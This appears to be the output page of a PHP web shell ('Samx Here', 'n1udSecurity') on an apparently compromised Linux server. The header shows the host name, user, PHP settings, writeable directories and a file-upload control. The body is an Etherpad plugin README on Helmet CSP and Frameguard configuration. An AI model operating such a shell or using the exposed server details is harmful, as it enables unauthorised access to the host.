Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/etherpad/src/node_modules/ep_helmet/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/etherpad/src/node_modules/ep_helmet/README.md
![Publish Status](https://github.com/ether/ep_helmet/workflows/Node.js%20Package/badge.svg) ![Backend Tests Status](https://github.com/ether/ep_helmet/workflows/Backend%20tests/badge.svg)

Etherpad plugin to bring in helmet.  Helmet provides security for express.  See the Helmet docs for it's capabilities.  Helmet also brings iFrame embed capabilities into Etherpad.

# Usage
Basic usage is simple, just install the plugin.

# Advanced usage.
Just use the same settings Helmet exposes for CSP.

## CSP
```
"ep_helmet":{
  "csp":{
    "directives": {
      "objectSrc": ["'none'"],
      "upgradeInsecureRequests": true,
      "workerSrc": false
    }
  }
}
```
The above CSP will need to be polished over time
https://ponyfoo.com/articles/content-security-policy-in-express-apps is a good write up that needs to be referred to and supported

## Frameguard
Frameguard can be used to set X-Frame-Options which is useful if you embed Etherpad in an iFrame.
```
"ep_helmet":{
  "frameguard":{
    "action": "allow-from",
    "domain": "https://DOMAINIFRAMEWILLBEHOSTEDIN.com"
  }
}
```

# Todo
 - [ ] Provide a good CSP example for Etherpad
 - [ ] Provide improves security for Etherpad (using nonce example etc for inline)

# License
Apache 2

SAMX